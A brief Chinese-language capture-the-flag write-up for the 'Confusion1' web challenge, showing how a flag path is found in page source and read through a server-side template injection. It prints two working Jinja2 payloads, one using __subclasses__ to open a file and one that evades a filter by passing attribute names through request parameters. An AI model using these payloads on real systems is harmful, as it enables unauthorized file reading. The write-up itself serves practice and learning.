攻防世界web

Posted on

Confusion1

image-20231019211535114

login.php中Ctrl+U查看页面源码发现flag路径

image-20231019211606001

login.php4测试ssti漏洞

image-20231019211630276

测试pyaload:

1
{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

image-20231019211702087

被过滤了

参数替换payload:

1
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

image-20231019211752275

cyberpeace{6df74ab602e50a9c41d5bb417cb241ed}

FlatScience